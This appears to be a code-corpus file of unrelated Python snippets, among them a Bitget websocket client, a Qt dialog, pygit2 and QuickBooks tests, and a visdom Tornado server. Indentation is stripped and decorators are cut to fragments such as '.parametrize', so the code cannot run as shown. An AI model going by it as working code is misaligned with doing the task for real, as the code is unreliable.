res = (await ws.send(json.dumps({'op': 'subscribe', 'args': [{'instType': self.product_type.upper(), 'channel': 'positions', 'instId': 'default'}]})))
print(res)
res = (await ws.send(json.dumps({'op': 'subscribe', 'args': [{'channel': 'orders', 'instType': self.product_type.upper(), 'instId': 'default'}]})))
print(res)
async def subscribe_to_user_stream(self, ws):
if self.is_logged_into_user_stream:
(await self.subscribe_to_user_streams(ws))
else:
(await self.login_to_user_stream(ws))
async def login_to_user_stream(self, ws):
timestamp = int(time())
signature = base64.b64encode(hmac.new(self.secret.encode('utf-8'), f'{timestamp}GET/user/verify'.encode('utf-8'), digestmod='sha256').digest()).decode('utf-8')
res = (await ws.send(json.dumps({'op': 'login', 'args': [{'apiKey': self.key, 'passphrase': self.passphrase, 'timestamp': timestamp, 'sign': signature}]})))
print(res)
async def transfer(self, type_: str, amount: float, asset: str='USDT'):
return {'code': '-1', 'msg': 'Transferring funds not supported for Bitget'}
def standardize_user_stream_event(self, event: Union[(List[Dict], Dict)]) -> Union[(List[Dict], Dict)]:
events = []
if (('event' in event) and (event['event'] == 'login')):
self.is_logged_into_user_stream = True
return {'logged_in': True}
if (('arg' in event) and ('data' in event) and ('channel' in event['arg'])):
if (event['arg']['channel'] == 'orders'):
for elm in event['data']:
if ((elm['instId'] == self.symbol) and ('status' in elm)):
standardized = {}
if (elm['status'] == 'cancelled'):
standardized['deleted_order_id'] = elm['ordId']
elif (elm['status'] == 'new'):
standardized['new_open_order'] = {'order_id': elm['ordId'], 'symbol': elm['instId'], 'price': float(elm['px']), 'qty': float(elm['sz']), 'type': elm['ordType'], 'side': elm['side'], 'position_side': elm['posSide'], 'timestamp': elm['uTime']}
elif (elm['status'] == 'partial-fill'):
standardized['deleted_order_id'] = elm['ordId']
standardized['partially_filled'] = True
elif (elm['status'] == 'full-fill'):
standardized['deleted_order_id'] = elm['ordId']
standardized['filled'] = True
events.append(standardized)
if (event['arg']['channel'] == 'positions'):
long_pos = {'psize_long': 0.0, 'pprice_long': 0.0}
short_pos = {'psize_short': 0.0, 'pprice_short': 0.0}
for elm in event['data']:
if ((elm['instId'] == self.symbol) and ('averageOpenPrice' in elm)):
if (elm['holdSide'] == 'long'):
long_pos['psize_long'] = round_(abs(float(elm['total'])), self.qty_step)
long_pos['pprice_long'] = truncate_float(elm['averageOpenPrice'], self.price_rounding)
elif (elm['holdSide'] == 'short'):
short_pos['psize_short'] = (- abs(round_(abs(float(elm['total'])), self.qty_step)))
short_pos['pprice_short'] = truncate_float(elm['averageOpenPrice'], self.price_rounding)
events.append(long_pos)
events.append(short_pos)
if (event['arg']['channel'] == 'account'):
for elm in event['data']:
if (elm['marginCoin'] == self.quote):
events.append({'wallet_balance': float(elm['available'])})
return events |
def remove_ambiguous_solutions(fn_in, db_lines, strict=True, verbose=True):
solutions = {}
dropped_solutions = set()
for l in db_lines:
parts = l.split()
feature = parts[0]
bits = frozenset(parts[1:])
if (bits in solutions):
if strict:
assert False, 'Found solution {} at least twice, in {} and {}'.format(bits, feature, solutions[bits])
else:
dropped_solutions.add(bits)
else:
solutions[bits] = feature
if strict:
return (0, db_lines)
drops = 0
output_lines = set()
for l in db_lines:
parts = l.split()
feature = parts[0]
bits = frozenset(parts[1:])
if (bits not in dropped_solutions):
output_lines.add(l)
drops += 1
elif verbose:
print(('WARNING: dropping line due to duplicate solution: %s' % l))
if (drops > 0):
print(('WARNING: %s dropped %s duplicate solutions' % (fn_in, drops)))
return (drops, output_lines) |
class QueuePicker(QDialog):
icons_path = None
vline_icn = None
branch_more_icn = None
branch_end_icn = None
branch_closed_icn = None
branch_open_icn = None
def __init__(self, parent):
QDialog.__init__(self, parent, (((Qt.WindowType.WindowSystemMenuHint | Qt.WindowType.WindowTitleHint) | Qt.WindowType.WindowMaximizeButtonHint) | Qt.WindowType.WindowCloseButtonHint))
self.mw = aqt.mw
self.parent = parent
if (QueuePicker.icons_path is None):
QueuePicker.icons_path = (utility.misc.get_web_folder_path() + 'icons/')
QueuePicker.vline_icn = (QueuePicker.icons_path + ('vline-night' if state.is_nightmode() else 'vline'))
QueuePicker.branch_more_icn = (QueuePicker.icons_path + ('branch-more-night' if state.is_nightmode() else 'branch-more'))
QueuePicker.branch_end_icn = (QueuePicker.icons_path + ('branch-end-night' if state.is_nightmode() else 'branch-end'))
QueuePicker.branch_closed_icn = (QueuePicker.icons_path + ('branch-closed-night' if state.is_nightmode() else 'branch-closed'))
QueuePicker.branch_open_icn = (QueuePicker.icons_path + ('branch-open-night' if state.is_nightmode() else 'branch-open'))
try:
self.dark_mode_used = state.is_nightmode()
except:
self.dark_mode_used = False
self.setup_ui()
self.setWindowTitle('Queue Manager')
self.showMaximized()
def setup_ui(self):
self.setLayout(QVBoxLayout())
self.mode_sel = QComboBox()
self.mode_sel.addItem('Queue', QVariant(1))
self.mode_sel.addItem('Schedules', QVariant(2))
self.mode_sel.currentIndexChanged.connect(self.mode_change)
self.layout().addWidget(self.mode_sel)
self.layout().setAlignment(Qt.AlignmentFlag.AlignTop)
self.queue_widget = QueueWidget(self)
self.sched_widget = ScheduleMWidget(self)
self.sched_widget.setVisible(False)
self.layout().addWidget(self.queue_widget)
self.layout().addWidget(self.sched_widget)
def chosen_id(self):
return self.queue_widget.chosen_id
def mode_change(self, ix):
if (ix == 0):
self.sched_widget.setVisible(False)
self.queue_widget.setVisible(True)
else:
self.queue_widget.setVisible(False)
self.sched_widget.setVisible(True)
self.sched_widget.refresh() |
class Structure(_Struct_Union_Base):
def __init__(self, name, align, members, bases, size, artificial=None):
self.name = name
self.align = int(align)
self.members = members
self.bases = bases
self.artificial = artificial
if (size is not None):
self.size = int(size)
else:
self.size = None
super(Structure, self).__init__() |
def generate_system_aws(file_name: str, include_null: bool, organization_key: str, aws_config: Optional[AWSConfig], url: AnyHttpUrl, headers: Dict[(str, str)]) -> str:
organization = get_organization(organization_key=organization_key, manifest_organizations=[], url=url, headers=headers)
assert organization
aws_systems = generate_aws_systems(organization, aws_config=aws_config)
write_system_manifest(file_name=file_name, include_null=include_null, systems=aws_systems)
return file_name |
def is_already_running(look_for='Music Caster', threshold=1, pid=None) -> bool:
if (platform.system() == 'Windows'):
for _ in get_running_processes(look_for=look_for, pid=pid):
threshold -= 1
if (threshold < 0):
return True
else:
p = Popen(['ps', 'h', '-C', look_for, '-o', 'comm'], stdout=PIPE, stdin=PIPE, stderr=DEVNULL, text=True)
return (p.stdout.readline().strip() != '')
return False |
def init_repository(path, bare=False, flags=C.GIT_REPOSITORY_INIT_MKPATH, mode=0, workdir_path=None, description=None, template_path=None, initial_head=None, origin_url=None):
if bare:
flags |= C.GIT_REPOSITORY_INIT_BARE
options = ffi.new('git_repository_init_options *')
C.git_repository_init_init_options(options, C.GIT_REPOSITORY_INIT_OPTIONS_VERSION)
options.flags = flags
options.mode = mode
if workdir_path:
workdir_path_ref = ffi.new('char []', to_bytes(workdir_path))
options.workdir_path = workdir_path_ref
if description:
description_ref = ffi.new('char []', to_bytes(description))
options.description = description_ref
if template_path:
template_path_ref = ffi.new('char []', to_bytes(template_path))
options.template_path = template_path_ref
if initial_head:
initial_head_ref = ffi.new('char []', to_bytes(initial_head))
options.initial_head = initial_head_ref
if origin_url:
origin_url_ref = ffi.new('char []', to_bytes(origin_url))
options.origin_url = origin_url_ref
crepository = ffi.new('git_repository **')
err = C.git_repository_init_ext(crepository, to_bytes(path), options)
check_error(err)
return Repository(to_str(path)) |
def test_repr_in_container():
class Container(containers.DeclarativeContainer):
dependency = providers.Dependency(instance_of=int)
container = Container()
assert (repr(container.dependency) == '<dependency_injector.providers.Dependency({0}) at {1}, container name: "Container.dependency">'.format(repr(int), hex(id(container.dependency)))) |
.parametrize('literal_type', LIST_OF_ALL_LITERAL_TYPES)
def test_variable_type(literal_type):
var = interface.Variable(type=literal_type, description='abc')
assert (var.type == literal_type)
assert (var.description == 'abc')
assert (var == interface.Variable.from_flyte_idl(var.to_flyte_idl())) |
(allow_guest=True)
def get_revisions(wiki_page_name):
revisions = frappe.db.get_all('Wiki Page Revision', {'wiki_page': wiki_page_name}, ['content', 'creation', 'owner', 'raised_by', 'raised_by_username'])
for revision in revisions:
revision.revision_time = pretty_date(revision.creation)
revision.author = (revision.raised_by_username or revision.raised_by or revision.owner)
revision.content = md_to_html(revision.content)
del revision.raised_by_username
del revision.raised_by
del revision.creation
del revision.owner
return revisions |
def fake_client(owned_manifest_path):
class FakeClient():
def cat(self, ipfs_hash):
return ipfs_hash
def add(self, file_or_dir_path, recursive):
if (Path(file_or_dir_path) == owned_manifest_path):
return {'Hash': 'QmbeVyFLSuEUxiXKwSsEjef6icpdTdA4kGG9BcrJXKNKUW', 'Name': '1.0.0.json', 'Size': '454'}
return FakeClient() |
class _Select(BuiltIn):
def __init__(self):
super().__init__('select')
def typecheck(self, args):
if (len(args) != 4):
raise _BErr(f'expected 4 arguments, got {len(args)}')
atyp = args[0].type
if (not atyp.is_real_scalar()):
raise _BErr(f'expected argument 1 to be a real scalar value, but got type {atyp}')
atyp = args[1].type
if (not atyp.is_real_scalar()):
raise _BErr(f'expected argument 2 to be a real scalar value, but got type {atyp}')
atyp = args[2].type
if (not atyp.is_real_scalar()):
raise _BErr(f'expected argument 3 to be a real scalar value, but got type {atyp}')
atyp = args[3].type
if (not atyp.is_real_scalar()):
raise _BErr(f'expected argument 4 to be a real scalar value, but got type {atyp}')
return atyp
def globl(self):
s = 'double _select_(double x, double v, double y, double z) {\n if (x < v) return y;\n else return z;\n}\n'
return s
def interpret(self, args):
x = args[0]
v = args[1]
y = args[2]
z = args[3]
if (x < v):
return y
else:
return z
def compile(self, args):
return f'_select_((double)*{args[0]}, (double)*{args[1]}, (double)*{args[2]}, (double)*{args[3]})' |
class ItemTest(QuickbooksTestCase):
def setUp(self):
super(ItemTest, self).setUp()
self.account_number = datetime.now().strftime('%d%H%M')
self.name = 'Test Item {0}'.format(self.account_number)
self.income_account = Account.where("AccountType = 'Income' and AccountSubType = 'SalesOfProductIncome'", max_results=1, qb=self.qb_client)[0]
self.expense_account = Account.where("AccountSubType = 'SuppliesMaterialsCogs'", max_results=1, qb=self.qb_client)[0]
self.asset_account = Account.where("AccountSubType = 'Inventory'", max_results=1, qb=self.qb_client)[0]
def test_create(self):
item = Item()
item.Name = self.name
item.Type = 'Inventory'
item.TrackQtyOnHand = True
item.QtyOnHand = 10
item.Sku = 'SKU123123'
item.InvStartDate = '2015-01-01'
item.IncomeAccountRef = self.income_account.to_ref()
item.ExpenseAccountRef = self.expense_account.to_ref()
item.AssetAccountRef = self.asset_account.to_ref()
item.save(qb=self.qb_client)
query_item = Item.get(item.Id, qb=self.qb_client)
self.assertEqual(query_item.Id, item.Id)
self.assertEqual(query_item.Name, self.name)
self.assertEqual(query_item.Type, 'Inventory')
self.assertEqual(query_item.Sku, 'SKU123123')
self.assertEqual(query_item.TrackQtyOnHand, True)
self.assertEqual(query_item.QtyOnHand, 10)
self.assertEqual(query_item.IncomeAccountRef.value, self.income_account.Id)
self.assertEqual(query_item.ExpenseAccountRef.value, self.expense_account.Id)
self.assertEqual(query_item.AssetAccountRef.value, self.asset_account.Id) |
def extractTinypandaSpace(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
def get_line_prefix(pre_lines: list[str], curr_line: str, col: int, qs: bool=True) -> str:
if ((curr_line is None) or (col > len(curr_line)) or curr_line.startswith('#')):
return None
prepend_string = ''.join(pre_lines)
curr_line = (prepend_string + curr_line)
col += len(prepend_string)
line_prefix = curr_line[:col].lower()
if (qs and ((line_prefix.find("'") > (- 1)) or (line_prefix.find('"') > (- 1)))):
sq_count = 0
dq_count = 0
for char in line_prefix:
if ((char == "'") and ((dq_count % 2) == 0)):
sq_count += 1
elif ((char == '"') and ((sq_count % 2) == 0)):
dq_count += 1
if (((dq_count % 2) == 1) or ((sq_count % 2) == 1)):
return None
return line_prefix |
class Application(tornado.web.Application):
def __init__(self, port=DEFAULT_PORT, base_url='', env_path=DEFAULT_ENV_PATH, readonly=False, user_credential=None, use_frontend_client_polling=False, eager_data_loading=False):
self.eager_data_loading = eager_data_loading
self.env_path = env_path
self.state = self.load_state()
self.layouts = self.load_layouts()
self.user_settings = self.load_user_settings()
self.subs = {}
self.sources = {}
self.port = port
self.base_url = base_url
self.readonly = readonly
self.user_credential = user_credential
self.login_enabled = False
self.last_access = time.time()
self.wrap_socket = use_frontend_client_polling
if user_credential:
self.login_enabled = True
with open((DEFAULT_ENV_PATH + 'COOKIE_SECRET'), 'r') as fn:
tornado_settings['cookie_secret'] = fn.read()
tornado_settings['static_url_prefix'] = (self.base_url + '/static/')
tornado_settings['debug'] = True
handlers = [(('%s/events' % self.base_url), PostHandler, {'app': self}), (('%s/update' % self.base_url), UpdateHandler, {'app': self}), (('%s/close' % self.base_url), CloseHandler, {'app': self}), (('%s/socket' % self.base_url), SocketHandler, {'app': self}), (('%s/socket_wrap' % self.base_url), SocketWrap, {'app': self}), (('%s/vis_socket' % self.base_url), VisSocketHandler, {'app': self}), (('%s/vis_socket_wrap' % self.base_url), VisSocketWrap, {'app': self}), (('%s/env/(.*)' % self.base_url), EnvHandler, {'app': self}), (('%s/compare/(.*)' % self.base_url), CompareHandler, {'app': self}), (('%s/save' % self.base_url), SaveHandler, {'app': self}), (('%s/error/(.*)' % self.base_url), ErrorHandler, {'app': self}), (('%s/win_exists' % self.base_url), ExistsHandler, {'app': self}), (('%s/win_data' % self.base_url), DataHandler, {'app': self}), (('%s/delete_env' % self.base_url), DeleteEnvHandler, {'app': self}), (('%s/env_state' % self.base_url), EnvStateHandler, {'app': self}), (('%s/fork_env' % self.base_url), ForkEnvHandler, {'app': self}), (('%s/user/(.*)' % self.base_url), UserSettingsHandler, {'app': self}), (('%s(.*)' % self.base_url), IndexHandler, {'app': self})]
super(Application, self).__init__(handlers, **tornado_settings)
def get_last_access(self):
if ((len(self.subs) > 0) or (len(self.sources) > 0)):
self.last_access = time.time()
return self.last_access
def save_layouts(self):
if (self.env_path is None):
warn_once('Saving and loading to disk has no effect when running with env_path=None.', RuntimeWarning)
return
layout_filepath = os.path.join(self.env_path, 'view', LAYOUT_FILE)
with open(layout_filepath, 'w') as fn:
fn.write(self.layouts)
def load_layouts(self):
if (self.env_path is None):
warn_once('Saving and loading to disk has no effect when running with env_path=None.', RuntimeWarning)
return ''
layout_dir = os.path.join(self.env_path, 'view')
layout_filepath = os.path.join(layout_dir, LAYOUT_FILE)
if os.path.isfile(layout_filepath):
with open(layout_filepath, 'r') as fn:
return fn.read()
else:
ensure_dir_exists(layout_dir)
return ''
def load_state(self):
state = {}
env_path = self.env_path
if (env_path is None):
warn_once('Saving and loading to disk has no effect when running with env_path=None.', RuntimeWarning)
return {'main': {'jsons': {}, 'reload': {}}}
ensure_dir_exists(env_path)
env_jsons = [i for i in os.listdir(env_path) if ('.json' in i)]
for env_json in env_jsons:
eid = env_json.replace('.json', '')
env_path_file = os.path.join(env_path, env_json)
if self.eager_data_loading:
try:
with open(env_path_file, 'r') as fn:
env_data = tornado.escape.json_decode(fn.read())
except Exception as e:
logging.warn('Failed loading environment json: {} - {}'.format(env_path_file, repr(e)))
continue
state[eid] = {'jsons': env_data['jsons'], 'reload': env_data['reload']}
else:
state[eid] = LazyEnvData(env_path_file)
if (('main' not in state) and ('main.json' not in env_jsons)):
state['main'] = {'jsons': {}, 'reload': {}}
serialize_env(state, ['main'], env_path=self.env_path)
return state
def load_user_settings(self):
settings = {}
if (platform.system() == 'Windows'):
base_dir = os.getenv('APPDATA')
elif (platform.system() == 'Darwin'):
base_dir = os.path.expanduser('~/Library/Preferences')
else:
base_dir = os.getenv('XDG_CONFIG_HOME', os.path.expanduser('~/.config'))
config_dir = os.path.join(base_dir, 'visdom')
user_css = ''
home_style_path = os.path.join(config_dir, 'style.css')
if os.path.exists(home_style_path):
with open(home_style_path, 'r') as f:
user_css += ('\n' + f.read())
project_style_path = os.path.join(self.env_path, 'style.css')
if os.path.exists(project_style_path):
with open(project_style_path, 'r') as f:
user_css += ('\n' + f.read())
settings['config_dir'] = config_dir
settings['user_css'] = user_css
return settings |
class CmdLook(default_cmds.CmdLook, _BaseTwitchCombatCommand):
def func(self):
super().func()
if (not self.args):
combathandler = self.get_or_create_combathandler()
txt = str(combathandler.get_combat_summary(self.caller))
maxwidth = max((display_len(line) for line in txt.strip().split('\n')))
self.msg(f'''|r{pad(' Combat Status ', width=maxwidth, fillchar='-')}|n
{txt}''') |
class OptionPlotoptionsPictorialSonificationTracksMappingNoteduration(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def test_full_extra_data(w3):
return_block_with_long_extra_data = construct_fixture_middleware({'eth_getBlockByNumber': {'extraData': ('0x' + ('ff' * 32))}})
w3.middleware_onion.inject(return_block_with_long_extra_data, layer=0)
block = w3.eth.get_block('latest')
assert (block.extraData == (b'\xff' * 32)) |
class OptionSeriesFunnelSonificationDefaultinstrumentoptionsMappingPan(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class ContractApiDialogues(Model, BaseContractApiDialogues):
def __init__(self, **kwargs: Any) -> None:
Model.__init__(self, **kwargs)
def role_from_first_message(message: Message, receiver_address: Address) -> BaseDialogue.Role:
return ContractApiDialogue.Role.AGENT
BaseContractApiDialogues.__init__(self, self_address=str(self.skill_id), role_from_first_message=role_from_first_message, dialogue_class=ContractApiDialogue) |
class JaggedLengthsToPresencesTestCase(unittest.TestCase):
def _test_jagged_lengths_to_presences(self, batch_size: int, max_seq_len: int=128, lengths_dtype: str='int32', presences_dtype: str='float16', test_suffix: str=''):
LENGTHS = Tensor(shape=[IntVar([1, batch_size], name='batch_size')], name='lengths', dtype=lengths_dtype, is_input=True)
PRESENCES = ops.jagged_lengths_to_presences()(lengths=LENGTHS, max_seq_len=max_seq_len, dtype=presences_dtype)
PRESENCES._attrs['name'] = 'presences'
PRESENCES._attrs['is_output'] = True
model = compile_model([PRESENCES], detect_target(), './tmp', f'test_jagged_lengths_to_presences_{test_suffix}')
torch_lengths_dtype = string_to_torch_dtype(lengths_dtype)
torch_presences_dtype = string_to_torch_dtype(presences_dtype)
for seed in range(10):
torch.manual_seed(seed)
lengths_pt = torch.randint(low=0, high=max_seq_len, size=(batch_size,), dtype=torch_lengths_dtype).cuda()
presences_pt = _compute_presences_pt(lengths_pt=lengths_pt, max_seq_len=max_seq_len, output_dtype=torch_presences_dtype).cuda()
presences = torch.empty(size=(batch_size, max_seq_len), dtype=torch_presences_dtype).cuda()
model.run_with_tensors(inputs={'lengths': lengths_pt}, outputs=[presences])
torch.testing.assert_close(presences, presences_pt)
([param(1, 1, 1, 'int32', 'bool'), param(2, 11, 23, 'int64', 'float32'), param(3, 1024, 256, 'int32', 'float16'), param(4, 1234, 567, 'int64', 'bool')])
def test_jagged_lengths_to_presences(self, i, batch_size, max_seq_len, lengths_dtype, presences_dtype):
self._test_jagged_lengths_to_presences(batch_size=batch_size, max_seq_len=max_seq_len, lengths_dtype=lengths_dtype, presences_dtype=presences_dtype, test_suffix=str(i)) |
.parametrize('start_with', ('angles', 'vectors'))
def test_identity(arrays, start_with):
if (start_with == 'angles'):
(intensity, inclination, declination) = arrays[0]
vector = magnetic_angles_to_vec(intensity, inclination, declination)
npt.assert_almost_equal(magnetic_vec_to_angles(*vector), (intensity, inclination, declination))
else:
(magnetic_e, magnetic_n, magnetic_u) = arrays[1]
angles = magnetic_vec_to_angles(magnetic_e, magnetic_n, magnetic_u)
npt.assert_almost_equal(magnetic_angles_to_vec(*angles), (magnetic_e, magnetic_n, magnetic_u)) |
class OptionPlotoptionsPolygonSonificationTracksMappingFrequency(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class SchemasSnippetResponseCommon(ModelComposed):
allowed_values = {}
validations = {}
_property
def additional_properties_type():
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type)
_nullable = False
_property
def openapi_types():
lazy_import()
return {'created_at': (datetime, none_type), 'deleted_at': (datetime, none_type), 'updated_at': (datetime, none_type), 'service_id': (str,), 'version': (str,), 'id': (str,)}
_property
def discriminator():
return None
attribute_map = {'created_at': 'created_at', 'deleted_at': 'deleted_at', 'updated_at': 'updated_at', 'service_id': 'service_id', 'version': 'version', 'id': 'id'}
read_only_vars = {'created_at', 'deleted_at', 'updated_at', 'service_id', 'version', 'id'}
_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
constant_args = {'_check_type': _check_type, '_path_to_item': _path_to_item, '_spec_property_naming': _spec_property_naming, '_configuration': _configuration, '_visited_composed_classes': self._visited_composed_classes}
composed_info = validate_get_composed_info(constant_args, kwargs, self)
self._composed_instances = composed_info[0]
self._var_name_to_model_instances = composed_info[1]
self._additional_properties_model_instances = composed_info[2]
discarded_args = composed_info[3]
for (var_name, var_value) in kwargs.items():
if ((var_name in discarded_args) and (self._configuration is not None) and self._configuration.discard_unknown_keys and self._additional_properties_model_instances):
continue
setattr(self, var_name, var_value)
return self
required_properties = set(['_data_store', '_check_type', '_spec_property_naming', '_path_to_item', '_configuration', '_visited_composed_classes', '_composed_instances', '_var_name_to_model_instances', '_additional_properties_model_instances'])
_js_args_to_python_args
def __init__(self, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
constant_args = {'_check_type': _check_type, '_path_to_item': _path_to_item, '_spec_property_naming': _spec_property_naming, '_configuration': _configuration, '_visited_composed_classes': self._visited_composed_classes}
composed_info = validate_get_composed_info(constant_args, kwargs, self)
self._composed_instances = composed_info[0]
self._var_name_to_model_instances = composed_info[1]
self._additional_properties_model_instances = composed_info[2]
discarded_args = composed_info[3]
for (var_name, var_value) in kwargs.items():
if ((var_name in discarded_args) and (self._configuration is not None) and self._configuration.discard_unknown_keys and self._additional_properties_model_instances):
continue
setattr(self, var_name, var_value)
if (var_name in self.read_only_vars):
raise ApiAttributeError(f'`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate class with read only attributes.')
_property
def _composed_schemas():
lazy_import()
return {'anyOf': [], 'allOf': [SnippetResponseCommonAllOf, Timestamps], 'oneOf': []} |
def get_base_config():
config = ml_collections.ConfigDict()
config.seed = 42
config.env_name = 'antmaze-medium-play-v0'
config.eval_episodes = 10
config.eval_interval = 5000
config.batch_size = 256
config.num_steps = int(1000000.0)
config.log_to_wandb = False
return config |
class SetGender(Command):
key = 'gender'
aliases = 'sex'
locks = 'call:all()'
def func(self):
caller = self.caller
arg = self.args.strip().lower()
if (arg not in ('male', 'female', 'neutral', 'ambiguous')):
caller.msg('Usage: male||female||neutral||ambiguous')
return
caller.db.gender = arg
caller.msg(('Your gender was set to %s.' % arg)) |
_models('spacy.Curie.v2')
def openai_curie_v2(config: Dict[(Any, Any)]=SimpleFrozenDict(max_tokens=500, temperature=_DEFAULT_TEMPERATURE), name: Literal['curie']='curie', strict: bool=OpenAI.DEFAULT_STRICT, max_tries: int=OpenAI.DEFAULT_MAX_TRIES, interval: float=OpenAI.DEFAULT_INTERVAL, max_request_time: float=OpenAI.DEFAULT_MAX_REQUEST_TIME, endpoint: Optional[str]=None) -> Callable[([Iterable[str]], Iterable[str])]:
return OpenAI(name=name, endpoint=(endpoint or Endpoints.NON_CHAT.value), config=config, strict=strict, max_tries=max_tries, interval=interval, max_request_time=max_request_time) |
def zip_folder(source_folder, dest_folder, zip_name):
import zipfile
import os
if (not os.path.exists(source_folder)):
print(f'{source_folder} does not exist')
return
if (not os.path.exists(dest_folder)):
print(f'{dest_folder} does not exist')
return
zip_file = os.path.join(dest_folder, zip_name)
with zipfile.ZipFile(zip_file, 'w', zipfile.ZIP_DEFLATED) as zipf:
for (foldername, subfolders, filenames) in os.walk(source_folder):
for filename in filenames:
filepath = os.path.join(foldername, filename)
zipf.write(filepath, arcname=os.path.relpath(filepath, source_folder))
if (os.path.dirname(zip_file) != dest_folder):
os.rename(zip_file, os.path.join(dest_folder, os.path.basename(zip_file)))
zip_file = os.path.join(dest_folder, os.path.basename(zip_file))
print(f'Zip file created at {zip_file}') |
class Action():
default_style: object = None
def __init__(self, **kwargs):
self.kwargs = kwargs
def __repr__(self):
x = [('macro.%s(' % (self.action,))]
for (k, v) in sorted(self.kwargs.items()):
x.append(('\n %s=%r,' % (k, v)))
x.append('\n )')
return ''.join(x)
def to_yaml(self):
return {self.action: self.kwargs}
def action(self):
return self.__class__.__name__
def execute(self):
return getattr(macro, self.action)(**convert(self.action, self.kwargs)).execute()
def update(self, action, values):
if (not isinstance(self, action)):
return None
for (k, v) in values.items():
if (k[0] in ('+',)):
self.kwargs[k[1:]] = v
if (k[0] in ('-',)):
self.kwargs.pop(k[1:], None)
if ((k[0] in ('=',)) and (k[1:] not in self.kwargs)):
self.kwargs[k[1:]] = v
return self |
class CaseSelectionWidget(QWidget):
caseSelectionChanged = Signal()
def __init__(self, case_names):
QWidget.__init__(self)
self._cases = case_names
self.__model = PlotCaseModel(case_names)
self.__signal_mapper = QSignalMapper(self)
self.__case_selectors = {}
self.__case_selectors_order = []
layout = QVBoxLayout()
add_button_layout = QHBoxLayout()
self.__add_case_button = QToolButton()
self.__add_case_button.setObjectName('add_case_button')
self.__add_case_button.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.__add_case_button.setText('Add case to plot')
self.__add_case_button.setIcon(QIcon('img:add_circle_outlined.svg'))
self.__add_case_button.setEnabled((len(self._cases) > 0))
self.__add_case_button.clicked.connect(self.addCaseSelector)
add_button_layout.addStretch()
add_button_layout.addWidget(self.__add_case_button)
add_button_layout.addStretch()
layout.addLayout(add_button_layout)
self.__case_layout = QVBoxLayout()
self.__case_layout.setContentsMargins(0, 0, 0, 0)
layout.addLayout(self.__case_layout)
self.addCaseSelector(disabled=True)
layout.addStretch()
self.setLayout(layout)
self.__signal_mapper.mapped[QWidget].connect(self.removeWidget)
def __caseName(self, widget) -> str:
return str(self.__case_selectors[widget].currentText())
def getPlotCaseNames(self):
if (self.__model.rowCount() == 0):
return []
return [self.__caseName(widget) for widget in self.__case_selectors_order]
def checkCaseCount(self):
self.__add_case_button.setEnabled(((len(self._cases) > 0) and (len(self.__case_selectors_order) < 5)))
for w in self.__case_selectors_order:
b = w.findChild(QToolButton, 'case_delete_button')
if b:
b.setEnabled((len(self.__case_selectors_order) > 1))
def addCaseSelector(self, disabled=False):
widget = QWidget()
layout = QHBoxLayout()
layout.setContentsMargins(0, 0, 0, 0)
widget.setLayout(layout)
combo = QComboBox()
combo.setObjectName('case_selector')
combo.setSizeAdjustPolicy(QComboBox.AdjustToMinimumContentsLengthWithIcon)
combo.setMinimumContentsLength(20)
combo.setModel(self.__model)
combo.currentIndexChanged.connect(self.caseSelectionChanged.emit)
layout.addWidget(combo, 1)
button = QToolButton()
button.setObjectName('case_delete_button')
button.setAutoRaise(True)
button.setDisabled(disabled)
button.setIcon(QIcon('img:delete_to_trash.svg'))
button.clicked.connect(self.__signal_mapper.map)
layout.addWidget(button)
self.__case_selectors[widget] = combo
self.__case_selectors_order.append(widget)
self.__signal_mapper.setMapping(button, widget)
self.__case_layout.addWidget(widget)
self.checkCaseCount()
